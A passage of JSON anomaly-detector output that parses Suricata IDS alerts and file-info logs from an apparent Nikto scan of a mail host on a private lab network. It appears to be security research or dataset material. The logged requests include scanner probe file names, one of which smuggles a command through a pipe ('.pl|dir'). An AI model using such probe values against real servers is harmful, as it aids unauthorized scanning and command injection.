"/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":78486216256524,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 78486216256524, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80", "/parser/model/time": 1583349514.210292, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46822, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.inc+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.210515, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":684282763424512,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46822, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":684282763424512,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 684282763424512, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80", "/parser/model/time": 1583349514.211929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46824, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idq", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.212088, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":785974704093502,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46824, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":785974704093502,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 785974704093502, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80", "/parser/model/time": 1583349514.213694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46826, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pl|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.213956, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":750897706188682,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
